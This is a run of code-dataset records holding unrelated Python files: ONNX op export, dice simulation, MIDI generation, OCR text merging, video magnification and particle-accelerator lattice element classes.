\", feat_strides_i={}\".format(\n module.feat_strides, module.anchor_wh_groups\n )\n code += \", image_hw_i={}\".format(\n module.image_hw\n )\n for stride, anchor_wh_groups in zip(module.feat_strides, module.anchor_wh_groups):\n code += \", anchor_wh_groups_{}_i={}\".format(stride, flatten(anchor_wh_groups)[0])\n code += \", legacy_bbox_i={})\".format(module.legacy_bbox)\n elif fn_name == 'DetectionPostProcessV1':\n code = code[:-1] + \", num_classes_i={}\".format(\n module.num_classes\n )\n code += \", class_offsets_i={}\".format(\n module.class_offsets\n )\n code += \", use_clippings_i={}\".format(\n module.use_clippings\n )\n code += \", image_hw_i={}\".format(\n module.image_size\n )\n code += \", nms_iou_threshold_f={}\".format(\n module.nms_threshold\n )\n code += \", nms_margin_f={}\".format(\n module.nms_margin\n )\n code += \", box_filter_threshold_f={}\".format(\n module.box_filter_threshold\n )\n code += \", pre_nms_top_k_i={}\".format(\n module.pre_nms_top_k\n )\n code += \", post_nms_top_k_i={}\".format(\n module.post_nms_top_k\n )\n # code += \", nms_padding_mode_s={}\".format(\n # str(module.nms_padding_mode)\n # )\n code += \", bbox_min_hw_i={})\".format(\n module.bbox_min_hw\n )\n elif fn_name == 'MultiScaleRoIAlign':\n code = code[:-1] + \", output_size_i={}\".format(\n module.output_size\n )\n code += \", image_hw_i={}\".format(\n module.image_hw\n )\n code += \", feature_strides_i={}\".format(\n module.feature_strides\n )\n code += \", canonical_level_i={}\".format(\n module.canonical_level\n )\n code += \", aligned_i={})\".format(\n module.aligned\n )\n\n ret = eval(code)\n\n if isinstance(ret, (list, tuple)):\n list_ret = ret\n else:\n list_ret = [ret]\n for r, node in zip(list_ret, output_nodes):\n r.setType(node.type())\n\n return ret\n\n\nregister_custom_op_symbolic(\"::prim_PythonOp\", symbolic_quantized_op, 1)\n","repo_name":"xingyun-xy/cap","sub_path":"changan_plugin_pytorch/utils/_register_quantized_onnx_ops.py","file_name":"_register_quantized_onnx_ops.py","file_ext":"py","file_size_in_byte":6973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41875320049","text":"n = 9\r\nreps = 1000000\r\ncount = 0\r\nfrom random import randint\r\n\r\nfor x in range(0,reps):\r\n\tdie1 = randint(1,n)\r\n\tdie2 = randint(1,n)\r\n\tif die1<4 and die2<4:\r\n\t\tif die1==3 or die2==3:\r\n\t\t\tcount = count+1\r\n\r\nprint(count/reps)\r\n","repo_name":"kana-mycin/quick-scripts","sub_path":"5 over n2.py","file_name":"5 over n2.py","file_ext":"py","file_size_in_byte":224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74172604329","text":"# Districts.\nNUMBER_OF_DISTRICTS = 1000\nMEAN_DISTANCE_CLIENT_DISTRICT = 20.0\nSTD_DISTANCE_CLIENT_DISTRICT = 8.0\nNUMBER_OF_CORES_DISTRICT = 2\nBANDWIDTH_CAPABILITY_DISTRICT = 10/1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_DISTRICT = 5.0\nSTD_PROCESSING_START_DELAY_DISTRICT = 2.0\n\n# Cities.\nNUMBER_OF_CITIES = 400\nMEAN_DISTANCE_CLIENT_CITY = 60.0\nSTD_DISTANCE_CLIENT_CITY = 15.0\nMEAN_DISTANCE_DISTRICT_CITY = 50.0\nSTD_DISTANCE_DISTRICT_CITY = 15.0\nNUMBER_OF_CORES_CITY = 2\nBANDWIDTH_CAPABILITY_CITY = 10 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_CITY = 5.0\nSTD_PROCESSING_START_DELAY_CITY = 2.0\n\n# Territories.\nNUMBER_OF_TERRITORIES = 200\nMEAN_DISTANCE_CLIENT_TERRITORY = 300.0\nSTD_DISTANCE_CLIENT_TERRITORY = 
100.0\nMEAN_DISTANCE_DISTRICT_TERRITORY = 290.0\nSTD_DISTANCE_DISTRICT_TERRITORY = 100.0\nNUMBER_OF_CORES_TERRITORY = 4\nBANDWIDTH_CAPABILITY_TERRITORY = 15 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_TERRITORY = 4.0\nSTD_PROCESSING_START_DELAY_TERRITORY = 1.0\n\n# Countries.\nNUMBER_OF_COUNTRIES = 80\nMEAN_DISTANCE_CLIENT_COUNTRY = 700.0\nSTD_DISTANCE_CLIENT_COUNTRY = 300.0\nMEAN_DISTANCE_DISTRICT_COUNTRY = 690.0\nSTD_DISTANCE_DISTRICT_COUNTRY = 300.0\nNUMBER_OF_CORES_COUNTRY = 4\nBANDWIDTH_CAPABILITY_COUNTRY = 15 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_COUNTRY = 4.0\nSTD_PROCESSING_START_DELAY_COUNTRY = 1.0\n\n# Continents.\nNUMBER_OF_CONTINENTS = 7\nMEAN_DISTANCE_CLIENT_CONTINENT = 1500.0\nSTD_DISTANCE_CLIENT_CONTINENT = 500.0\nMEAN_DISTANCE_DISTRICT_CONTINENT = 1490.0\nSTD_DISTANCE_DISTRICT_CONTINENT = 500.0\nNUMBER_OF_CORES_CONTINENT = 1000\nBANDWIDTH_CAPABILITY_CONTINENT = 20 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_CONTINENT = 4.0\nSTD_PROCESSING_START_DELAY_CONTINENT = 1.0\n\n# Central.\nMEAN_DISTANCE_CLIENT_CENTRAL = 5000.0\nSTD_DISTANCE_CLIENT_CENTRAL = 2000.0\nMEAN_DISTANCE_DISTRICT_CENTRAL = 4990.0\nSTD_DISTANCE_DISTRICT_CENTRAL = 2000.0\nNUMBER_OF_CORES_CENTRAL = 1000\nBANDWIDTH_CAPABILITY_CENTRAL = 20 / 1000 # MB that a core can process in a millisecond.\nMEAN_PROCESSING_START_DELAY_CENTRAL = 4.0\nSTD_PROCESSING_START_DELAY_CENTRAL = 1.0\n","repo_name":"Desno365/location-aware-edge-api","sub_path":"evaluation/python-simulator/src/default_architecture_parameters.py","file_name":"default_architecture_parameters.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"}
+{"seq_id":"4537097956","text":"\"\"\"\r\nThe Songwriter package generates MIDI files from scores given in dict format\r\n\"\"\"\r\n\r\nfrom mido import MidiTrack, Message, MidiFile\r\nimport numpy as np\r\n\r\n\r\nclass TrackWriter:\r\n    \"\"\"\r\n    Given the key, tempo, score and other musical info, write out one track of music\r\n    \"\"\"\r\n    def __init__(self, track, score, channel, major=\"c\", tempo=80):\r\n        self.track = track\r\n        self.score = score\r\n        self.major = major\r\n        self.tempo = tempo\r\n        self.channel = channel\r\n        self.notes = score[\"notes\"]\r\n        self.durs = np.asarray([x[1] for x in self.notes])\r\n        self.beats = np.cumsum(self.durs)\r\n\r\n    def add_note(\r\n        self, note, duration, start=0, volume=75,\r\n        octave=0, tempo=80, chan=0, major=\"c\", change=0,\r\n        start_type=\"beat\", switch=\"openclose\",\r\n        ctrls=[], cvalues=[]\r\n    ):\r\n        if note == \"r0\": # rest\r\n            real_vol = 0\r\n            real_note = 60\r\n        else:\r\n            nlp = [\r\n                \"c\", \"c+\", \"d\", \"d+\", \"e\", \"f\",\r\n                \"f+\", \"g\", \"g+\", \"a\", \"a+\", \"b\"\r\n            ]\r\n            nlm = [\r\n                \"c\", \"d-\", \"d\", \"e-\", \"e\", \"f\",\r\n                \"g-\", \"g\", \"a-\", \"a\", \"b-\", \"b\"\r\n            ]\r\n\r\n            n = note[0:-1]\r\n            try:\r\n                f1 = nlp.index(n)\r\n            except ValueError:\r\n                try:\r\n                    f1 = nlm.index(n)\r\n                except ValueError:\r\n                    raise ValueError(\"Please input correct note!\")\r\n            try:\r\n                f2 = nlp.index(major)\r\n            except ValueError:\r\n                try:\r\n                    f2 = nlm.index(major)\r\n                except ValueError:\r\n                    raise ValueError(\"Please input correct note!\")\r\n\r\n            height = eval(note[-1])\r\n            if f2 > 6:\r\n                f2 -= 12\r\n\r\n            real_vol = int(1.27 * volume)\r\n            real_note = f1 + f2 + 12 * (height + 1 + octave) + change\r\n\r\n        real_dur = int(28800 / tempo * duration)\r\n        real_st = 0\r\n\r\n        if start_type == \"beat\":\r\n            real_st = int(28800 / tempo * start)\r\n        elif start_type == \"time\":\r\n            real_st = int(480 * start)\r\n        else:\r\n            raise ValueError(\"Please input correct start_type:\\\r\n                'beat' or 'time'.\")\r\n\r\n        if ctrls:\r\n            for i in range(len(ctrls)):\r\n                mc = Message(\"control_change\", channel=chan, control=ctrls[i], value=cvalues[i], time=0)\r\n                self.track.append(mc)\r\n\r\n        if switch == \"openclose\":\r\n            mstart = Message(\r\n                \"note_on\", note=real_note, velocity=real_vol,\r\n                time=real_st, channel=chan\r\n            )\r\n            mend = Message(\r\n                \"note_off\", note=real_note, velocity=real_vol,\r\n                time=real_dur, channel=chan\r\n            )\r\n            self.track.append(mstart)\r\n            self.track.append(mend)\r\n        elif switch == \"open\":\r\n            mstart = Message(\r\n                \"note_on\", note=real_note, velocity=real_vol,\r\n                time=real_st, channel=chan\r\n            )\r\n            self.track.append(mstart)\r\n        elif switch == \"close\":\r\n            mend = Message(\r\n                \"note_off\", note=real_note, velocity=real_vol,\r\n                time=real_dur, channel=chan\r\n            )\r\n            self.track.append(mend)\r\n        else:\r\n            raise ValueError(\"Please input correct switch:\\\r\n                'open', 'close' or 'openclose'.\")\r\n\r\n    def get_volumes(self):\r\n        vctrl = self.score[\"options\"][\"volume\"]\r\n        if len(self.beats) - 1 != vctrl[-1][1]:\r\n            raise ValueError(\"The number of notes is\", len(self.beats), \"\\n\\\r\n                but the last note in volume control is\", vctrl[-1][1])\r\n        vlist = [0] * len(self.beats)\r\n        for i in range(len(vctrl)):\r\n            vlist[vctrl[i][1]] = vctrl[i][0]\r\n        for j in range(len(vctrl) - 1):\r\n            for k in range(vctrl[j][1] + 1, vctrl[j + 1][1]):\r\n                vol = vctrl[j][0] + (vctrl[j + 1][0] - vctrl[j][0])\\\r\n                    / (self.beats[vctrl[j + 1][1]] - self.beats[vctrl[j][1]])\\\r\n                    * (self.beats[k] - self.beats[vctrl[j][1]])\r\n                vlist[k] = vol\r\n        return vlist\r\n\r\n    def write_a_track(self):\r\n        try:\r\n            namelist = self.score[\"options\"].keys()\r\n            if len(namelist) == 0:\r\n                raise KeyError(\"no keys in namelist\")\r\n        except KeyError:\r\n            for i in range(len(self.notes)):\r\n                self.add_note(\r\n                    self.notes[i][0], self.notes[i][1],\r\n                    tempo=self.tempo, chan=self.channel, major=self.major,\r\n                )\r\n        else:\r\n            oclist = [0] * len(self.notes)\r\n            cglist = [0] * len(self.notes)\r\n            ctrnamedict = {\r\n                \"pedal\": 64,\r\n                \"tweak\": 1\r\n            }\r\n            ctrllist = []\r\n            for i in range(len(self.notes)):\r\n                ctrllist.append([])\r\n            cvaluelist = []\r\n            for i in range(len(self.notes)):\r\n                cvaluelist.append([])\r\n            vlist = [75] * len(self.notes)\r\n            for name in namelist:\r\n                if name == \"octave\":\r\n                    for se in self.score[\"options\"][\"octave\"]:\r\n                        oc, start, end = se\r\n                        oclist[start:end + 1] = [oc] * (end + 1 - start)\r\n                elif name == \"tonechange\":\r\n                    for se in self.score[\"options\"][\"tonechange\"]:\r\n                        cg, start, end = se\r\n                        cglist[start:end + 1] = [cg] * (end + 1 - start)\r\n                elif name == \"volume\":\r\n                    vlist = self.get_volumes()\r\n                else:\r\n                    ctrlnum = ctrnamedict[name]\r\n                    for msgs in self.score[\"options\"][name]:\r\n                        ctrllist[msgs[1]].append(ctrlnum)\r\n                        cvaluelist[msgs[1]].append(msgs[0])\r\n\r\n            for i in range(len(self.notes)):\r\n                self.add_note(\r\n                    self.notes[i][0], self.notes[i][1],\r\n                    volume=vlist[i], octave=oclist[i], change=cglist[i],\r\n                    chan=self.channel, major=self.major, tempo=self.tempo,\r\n                    ctrls=ctrllist[i], cvalues=cvaluelist[i]\r\n                )\r\n\r\n\r\nclass SongWriter:\r\n    \"\"\"\r\n    Combine the information of the different tracks in the score and write the music to a MIDI file\r\n    \"\"\"\r\n    def __init__(self, numtr, json, out):\r\n        self.file = MidiFile()\r\n        self.tracks = self.file.tracks\r\n        self.numtr = numtr\r\n        for x in range(self.numtr):\r\n            self.tracks.append(MidiTrack())\r\n        self.out = out\r\n        self.json = json\r\n    \r\n    def 
makesong(self):\r\n        part = self.json\r\n        major = part[\"major\"]\r\n        tempo = part[\"tempo\"]\r\n        channellist = part[\"channellist\"]\r\n        tonelist = part[\"tonelist\"]\r\n        melody = part[\"melody\"]\r\n        for x in range(self.numtr):\r\n            tw = TrackWriter(\r\n                self.tracks[x], melody[x],\r\n                channellist[x], major, tempo\r\n            )\r\n            self.tracks[x].append(Message(\r\n                \"program_change\", channel=channellist[x],\r\n                program=tonelist[x]\r\n            ))\r\n            tw.write_a_track()\r\n\r\n        self.file.save(self.out)","repo_name":"LiShuoxue/Kunqu_Final","sub_path":"Songwriter.py","file_name":"Songwriter.py","file_ext":"py","file_size_in_byte":7385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"23232552224","text":"# 1. Fruit - text, one of: \"Watermelon\", \"Mango\", \"Pineapple\" or \"Raspberry\"\n# 2. Set size - text, one of: \"small\" or \"big\"\n# 3. Number of ordered sets - an integer in the range [1 … 10000]\n\nfruit = input()\nsize = input()\ncount = int(input())\nprice = 0\n\nif size == \"small\":\n    if fruit == \"Watermelon\":\n        price = 2 * 56\n    elif fruit == \"Mango\":\n        price = 2 * 36.66\n    elif fruit == \"Pineapple\":\n        price = 2 * 42.10\n    elif fruit == \"Raspberry\":\n        price = 2 * 20\n\nif size == \"big\":\n    if fruit == \"Watermelon\":\n        price = 5 * 28.70\n    elif fruit == \"Mango\":\n        price = 5 * 19.60\n    elif fruit == \"Pineapple\":\n        price = 5 * 24.80\n    elif fruit == \"Raspberry\":\n        price = 5 * 15.20\n\ntotal = price * count\nif total >= 400 and total <= 1000:\n    total *= 0.85\nelif total > 1000:\n    total /= 2\nprint(F\"{total:.2F} lv.\")","repo_name":"Nedelchev86/Python-Basic-SoftUni","sub_path":"Online Exam_28_and_29_March_2020/03_Energy_Booster.py","file_name":"03_Energy_Booster.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"30690004152","text":"import os, utils, glob\n\n\ndef combine_text(input_dir, output_dir, image_order):\n    '''\n    Combines the text of multiple scans into one file in the image order specified by the user, and writes output to text file\n    '''\n    print(\"input_dir\", input_dir)\n    print(\"output_dir\", output_dir)\n    for root, subdirs, files in os.walk(input_dir):\n        output_file = output_dir + root[len(input_dir):] + \".txt\"\n        print(\"root\", root)\n        print(\"output_file\", output_file)\n        print(\"root[len..]\", root[len(input_dir):])\n        structure = os.path.dirname(output_file)\n        utils.construct_output_dir(structure)\n        if os.path.exists(output_file):\n            continue\n        pages = []\n        for file in files:\n            if file.split(\".\")[1] == \"txt\":\n                pages.append(file)\n        if pages:\n            if image_order == \"underscore_numerical\": #eg book_1.jpg book_2.jpg book_3.jpg\n                pages.sort(key = lambda pages: int(pages.split(\".\")[0].split(\"_\")[-1]))\n            elif image_order == \"dash_numerical\": # eg book-1.jpg, book-2.jpg, book-3.jpg\n                pages.sort(key = lambda pages: int(pages.split(\".\")[0].split(\"-\")[-1]))\n            elif image_order == \"numerical\": #eg. 1.jpg, 2.jpg, 3.jpg\n                pages.sort(key = lambda pages: int(pages.split(\".\")[0]))\n            else: # alphabetical, eg a.jpg, b.jpg, c.jpg, d.jpg\n                pages.sort()\n\n            with open(output_file, 'w') as output:\n                for file in pages: # add a sort by for file naming\n                    abspath = os.path.join(root, file)\n                    with open(abspath) as f:\n                        for line in f:\n                            output.write(line)\n            print(str(len(pages)) + \" images combined and written to \" + output_file)\n    return\n\n","repo_name":"miielab/miienlp","sub_path":"miienlp/ocr/src/combine.py","file_name":"combine.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"16991163005","text":"import json \r\nfrom eulerian_magnification import *\r\nfrom phase_based_magnification import *\r\n\r\nfileTrials = [\"parameters_mid_alpha.json\", \"parameters_high_alpha.json\", \"parameters_low_alpha.json\"]\r\n\r\n# fileTrials = [\"testSample_1-3.json\",\"testSample_2-4.json\",\"testSample_4-6.json\",\"testSample_6-8.json\"]\r\n\r\nfor jsonFile in fileTrials:\r\n    try:\r\n        parametersFn = open(jsonFile, \"r\")\r\n    except FileNotFoundError:\r\n        print(\"Please make sure parameters.json file exists in current directory\")\r\n        continue\r\n\r\n    parameters = json.load(parametersFn)\r\n\r\n    for magnifyMode, files in parameters.items():\r\n        if magnifyMode == \"eulerian\":\r\n            print(\"working on Eulerian based magnification\")\r\n            for fileName, params in files.items():\r\n                if params[\"filter\"] == \"butter\":\r\n                    try:\r\n                        videoMagnificationButterWorthFilter(fileName,params[\"alpha\"],params[\"lambda_c\"],params[\"samplingRate\"],params[\"chromeAttenuation\"],params[\"lowFreq\"],params[\"highFreq\"])\r\n                    except Exception as e:\r\n                        print(\"Failed in processing\", fileName, \"due to\", e)\r\n\r\n                elif params[\"filter\"] == \"ideal\":\r\n                    try:\r\n                        videoMagnificationIdealFilter(fileName,params[\"alpha\"],params[\"lambda_c\"],params[\"samplingRate\"],params[\"chromeAttenuation\"],params[\"lowFreq\"],params[\"highFreq\"])\r\n                    except Exception as e:\r\n                        print(\"Failed in processing\", fileName, \"due to\", e)\r\n        elif magnifyMode == \"riesz\":\r\n            print(\"working on Riesz based magnification\")\r\n            for fileName, params in files.items():\r\n                try:\r\n                    phaseBasedMagnification(fileName, params[\"alpha\"],params[\"samplingRate\"], params[\"lowFreq\"], params[\"highFreq\"])\r\n                except Exception as e:\r\n                    print(\"Failed in processing\", fileName, \"due to\", e)","repo_name":"mmareimorsy/EulerianVideoMagnification","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1951,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"17047047759","text":"from operator import add\nfrom SimulationFramework.Framework_objects import *\nfrom SimulationFramework.FrameworkHelperFunctions import *\nfrom SimulationFramework.FrameworkHelperFunctions import _rotation_matrix\n\nclass dipole(frameworkElement):\n\n    def __init__(self, name=None, type='dipole', **kwargs):\n        super(dipole, self).__init__(name, type, **kwargs)\n        self.add_default('csr_bins', 100)\n        self.add_default('deltaL', 0)\n        self.add_default('csr_enable', 1)\n        self.add_default('isr_enable', True)\n        self.add_default('n_kicks', 10)\n        self.add_default('sr_enable', True)\n        self.add_default('integration_order', 4)\n        self.add_default('nonlinear', 1)\n        self.add_default('smoothing_half_width', 1)\n        self.add_default('edge_order', 2)\n        self.add_default('edge1_effects', 1)\n        self.add_default('edge2_effects', 1)\n\n    # 
@property\n # def middle(self):\n # start = self.position_start\n # length_vector = self.rotated_position([0,0, self.length / 2.0], offset=[0,0,0], theta=self.theta)\n # starting_middle = length_vector\n # # print(self.objectname, self.theta, self.starting_rotation, self.rotated_position(starting_middle, offset=self.starting_offset, theta=self.starting_rotation)[0])\n # return np.array(start) + self.rotated_position(starting_middle, offset=self.starting_offset, theta=self.starting_rotation)\n\n @property\n def middle(self):\n sx, sy, sz = self.position_start\n angle = -self.angle\n l = self.length\n if abs(angle) > 0:\n cx = 0\n cy = 0\n cz = (l * np.tan(angle/2.0)) / angle\n vec = [cx, cy, cz]\n else:\n vec = [0,0,l/2.0]\n # print (vec)\n return np.array(self.position_start) + self.rotated_position(np.array(vec), offset=self.starting_offset, theta=self.y_rot)\n\n @property\n def arc_middle(self):\n sx, sy, sz = self.position_start\n angle = -self.angle\n l = self.length\n r = l / angle\n if abs(angle) > 0:\n cx = r * (np.cos(angle/2.0) - 1)\n cy = 0\n cz = r * np.sin(angle/2.0)\n vec = [cx, cy, cz]\n else:\n vec = [0,0,l/2.0]\n # print (vec)\n return np.array(self.position_start) + self.rotated_position(np.array(vec), offset=self.starting_offset, theta=self.y_rot)\n\n @property\n def line_middle(self):\n sx, sy, sz = self.position_start\n angle = -self.angle\n l = self.length\n r = l / angle\n if abs(angle) > 0:\n cx = 0.5 * r * (np.cos(angle) - 1)\n cy = 0\n cz = 0.5 * r * np.sin(angle)\n vec = [cx, cy, cz]\n else:\n vec = [0,0,l/2.0]\n # print (vec)\n return np.array(self.position_start) + self.rotated_position(np.array(vec), offset=self.starting_offset, theta=self.y_rot)\n\n @property\n def TD_middle(self):\n sx, sy, sz = self.position_start\n angle = -self.angle\n l = self.length\n r = l / angle\n if abs(angle) > 0:\n cx = 0.25 * r * (2.0 * np.cos(angle/2.0) + np.cos(angle) - 3)\n cy = 0\n cz = 0.25 * r * (2 * np.sin(angle/2.0) + np.sin(angle))\n vec = [cx, cy, cz]\n else:\n vec = [0,0,l/2.0]\n # print (vec)\n return np.array(self.position_start) + self.rotated_position(np.array(vec), offset=self.starting_offset, theta=self.y_rot)\n\n @property\n def end(self):\n start = self.position_start\n if abs(self.angle) > 1e-9:\n ex = -1. 
* (self.length * (np.cos(self.angle) - 1)) / self.angle\n ey = 0\n ez = (self.length * (np.sin(self.angle))) / self.angle\n return np.array(self.position_start) + self.rotated_position(np.array([ex, ey, ez]), offset=self.starting_offset, theta=-1*self.y_rot)\n else:\n return np.array(self.position_start) + self.rotated_position(np.array([0,0,self.length]), offset=self.starting_offset, theta=-1*self.y_rot)\n\n @property\n def width(self):\n if 'width' in self.objectproperties:\n return self.objectproperties['width']\n else:\n return 0.2\n @width.setter\n def width(self, w):\n self.objectproperties['width'] = w\n\n def __neg__(self):\n newself = copy.deepcopy(self)\n if 'exit_edge_angle' in newself.objectproperties and 'entrance_edge_angle' in newself.objectproperties:\n e1 = newself['entrance_edge_angle']\n e2 = newself['exit_edge_angle']\n newself.objectproperties['entrance_edge_angle'] = e2\n newself.objectproperties['exit_edge_angle'] = e1\n elif 'entrance_edge_angle' in newself.objectproperties:\n newself.objectproperties['exit_edge_angle'] = newself.objectproperties['entrance_edge_angle']\n del newself.objectproperties['entrance_edge_angle']\n elif 'exit_edge_angle' in newself.objectproperties:\n newself.objectproperties['entrance_edge_angle'] = newself.objectproperties['exit_edge_angle']\n del newself.objectproperties['exit_edge_angle']\n newself.objectname = '-'+newself.objectname\n return newself\n\n def check_value(self, estr, default=0):\n if estr in self.objectproperties:\n if isinstance(self.objectproperties[estr], str):\n return checkValue(self, self.objectproperties[estr],default)\n else:\n return self.objectproperties[estr]\n else:\n return default\n\n @property\n def intersect(self):\n return self.rho * np.tan(self.angle / 2.0)\n @property\n def rho(self):\n return -1*self.length/self.angle if self.length is not None and abs(self.angle) > 1e-9 else 0\n\n @property\n def e1(self):\n return self.check_value('entrance_edge_angle')\n @property\n def e2(self):\n return self.check_value('exit_edge_angle')\n\n def _write_Elegant(self):\n wholestring=''\n etype = self._convertType_Elegant(self.objecttype)\n string = self.objectname+': '+ etype\n k1 = self.k1 if self.k1 is not None else 0\n for key, value in list(merge_two_dicts({'k1': k1}, merge_two_dicts(self.objectproperties, self.objectdefaults)).items()):\n if not key is 'name' and not key is 'type' and not key is 'commandtype' and self._convertKeword_Elegant(key) in elements_Elegant[etype]:\n # if 'bins' in key or 'bins' in self._convertKeword_Elegant(key):\n # print('BINS KEY ', key, ' ', self._convertKeword_Elegant(key))\n if 'edge_angle' in key:\n key = self._convertKeword_Elegant(key)\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n else:\n value = getattr(self, key) if hasattr(self, key) and getattr(self, key) is not None else value\n key = self._convertKeword_Elegant(key)\n value = 1 if value is True else value\n value = 0 if value is False else value\n tmpstring = ', '+key+' = '+str(value)\n if len(string+tmpstring) > 76:\n wholestring+=string+',&\\n'\n string=''\n string+=tmpstring[2::]\n else:\n string+= tmpstring\n wholestring+=string+';\\n'\n return wholestring\n\n @property\n def corners(self):\n corners = [0,0,0,0]\n if hasattr(self, 'global_rotation') and self.global_rotation is not None:\n rotation = self.global_rotation[2] if len(self.global_rotation) is 3 else self.global_rotation\n else:\n rotation = 0\n theta = self.e1+rotation\n corners[0] = 
np.array(list(map(add, np.transpose(self.position_start), np.dot([-self.width*self.length,0,0], _rotation_matrix(theta)))))\n corners[3] = np.array(list(map(add, np.transpose(self.position_start), np.dot([self.width*self.length,0,0], _rotation_matrix(theta)))))\n theta = self.angle-self.e2+rotation\n corners[1] = np.array(list(map(add, np.transpose(self.end), np.dot([-self.width*self.length,0,0], _rotation_matrix(theta)))))\n corners[2] = np.array(list(map(add, np.transpose(self.end), np.dot([self.width*self.length,0,0], _rotation_matrix(theta)))))\n corners = [self.rotated_position(x, offset=self.starting_offset, theta=self.starting_rotation) for x in corners]\n return corners\n\n def write_CSRTrack(self, n):\n z1 = self.position_start[2]\n z2 = self.position_end[2]\n return \"\"\"dipole{\\nposition{rho=\"\"\"+str(z1)+\"\"\", psi=\"\"\"+str(chop(self.theta+self.e1))+\"\"\", marker=d\"\"\"+str(n)+\"\"\"a}\\nproperties{r=\"\"\"+str(self.rho)+\"\"\"}\\nposition{rho=\"\"\"+str(z2)+\"\"\", psi=\"\"\"+str(chop(self.theta+self.angle-self.e2))+\"\"\", marker=d\"\"\"+str(n)+\"\"\"b}\\n}\\n\"\"\"\n\n def write_ASTRA(self, n):\n if abs(checkValue(self, 'strength', default=0)) > 0 or abs(self.rho) > 0:\n corners = self.corners\n if self.plane is None:\n self.plane = 'horizontal'\n params = OrderedDict([\n ['D_Type', {'value': '\\''+self.plane+'\\'', 'default': '\\'horizontal\\''}],\n ['D_Gap', {'type': 'list', 'value': [self.gap, self.gap], 'default': [0.0001, 0.0001]}],\n ['D1', {'type': 'array', 'value': [corners[3][0],corners[3][2]] }],\n ['D3', {'type': 'array', 'value': [corners[2][0],corners[2][2]] }],\n ['D4', {'type': 'array', 'value': [corners[1][0],corners[1][2]] }],\n ['D2', {'type': 'array', 'value': [corners[0][0],corners[0][2]] }],\n # ['D_xoff', {'value': self.start[0] + self.dx, 'default': 0}],\n # ['D_yoff', {'value': self.start[1] + self.dy, 'default': 0}],\n # ['D_zoff', {'value': self.dz, 'default': 0}],\n # ['D_xrot', {'value': self.y_rot + self.dy_rot, 'default': 0}],\n # ['D_yrot', {'value': self.x_rot + self.dx_rot, 'default': 0}],\n ['D_zrot', {'value': self.z_rot + self.dz_rot, 'default': 0}],\n ])\n if abs(checkValue(self, 'strength', default=0)) > 0 or not abs(self.rho) > 0:\n params['D_strength'] = {'value': checkValue(self, 'strength', 0), 'default': 1e6}\n else:\n params['D_radius'] = {'value': self.rho, 'default': 1e6}\n return self._write_ASTRA(params, n)\n else:\n return None\n\n def gpt_coordinates(self, position, rotation):\n x,y,z = chop(position, 1e-6)\n psi, phi, theta = rotation\n output =''\n for c in [0, 0, z]:\n output += str(c)+', '\n output += 'cos('+str(self.angle)+'), 0, -sin('+str(self.angle)+'), 0, 1 ,0'\n return output\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n # field = Brho/self.rho if abs(self.rho) > 0 else 0\n field = self.angle * Brho / self.length\n if abs(field) > 0 and abs(self.rho) < 100:\n relpos, relrot = ccs.relative_position(self.position_start, self.global_rotation)\n relpos = relpos + [0, 0, self.intersect]\n coord = self.gpt_coordinates(relpos, relrot)\n new_ccs = self.gpt_ccs(ccs).name\n b1 = 1.0 / (2 * self.check_value(self.half_gap, default=0.02) * self.check_value(self.edge_field_integral, default=0.4))\n dl = 0 if self.deltaL is None else self.deltaL\n # print(self.objectname, ' - deltaL = ', dl)\n # b1 = 0.\n '''\n ccs( \"wcs\", 0, 0, startofdipole + intersect1, Cos(theta), 0, -Sin(theta), 0, 1, 0, \"bend1\" ) ;\n sectormagnet( \"wcs\", \"bend1\", rho, field, e1, e2, 0., 100., 0 ) ;\n '''\n output = 'ccs( ' + 
ccs.name + ', '+ coord + ', ' + new_ccs + ');\\n'\n output += 'sectormagnet( ' + ccs.name + ', '+ new_ccs +', '+str(abs(self.rho))+', '+str(abs(field))+', ' + str(abs(self.e1)) + ', ' + str(abs(self.e2)) + ', ' + str(abs(dl)) + ', ' + str(b1) + ', 0);\\n'\n else:\n output = ''\n return output\n\n def gpt_ccs(self, ccs):\n if abs(self.angle) > 0 and abs(self.rho) < 100:\n # print('Creating new CCS')\n number = str(int(ccs._name.split('_')[1])+1) if ccs._name is not \"wcs\" else \"1\"\n name = 'ccs_' + number if ccs._name is not \"wcs\" else \"ccs_1\"\n # print('middle position = ', self.end)\n return gpt_ccs(name, self.end, self.global_rotation + np.array([0, 0, self.angle]), self.intersect)\n else:\n return ccs\n\nclass kicker(dipole):\n\n def __init__(self, name=None, type='kicker', **kwargs):\n super(kicker, self).__init__(name, type, **kwargs)\n\n @property\n def angle(self):\n hkick = self.horizontal_kick if self.horizontal_kick is not None else 0\n vkick = self.vertical_kick if self.vertical_kick is not None else 0\n return np.sqrt(hkick**2 + vkick**2)\n\n @property\n def z_rot(self):\n hkick = self.horizontal_kick if self.horizontal_kick is not None else 0\n vkick = self.vertical_kick if self.vertical_kick is not None else 0\n return self.global_rotation[0] + np.arctan2(vkick, hkick)\n\n def write_ASTRA(self, n):\n output = ''\n output = super(kicker, self).write_ASTRA(n)\n return output\n\n def write_GPT(self, Brho, ccs=\"wcs\", *args, **kwargs):\n return ''\n\n def gpt_ccs(self, ccs):\n return ccs\n\nclass quadrupole(frameworkElement):\n\n def __init__(self, name=None, type='quadrupole', **kwargs):\n super(quadrupole, self).__init__(name, type, **kwargs)\n self.add_default('k1l', 0)\n 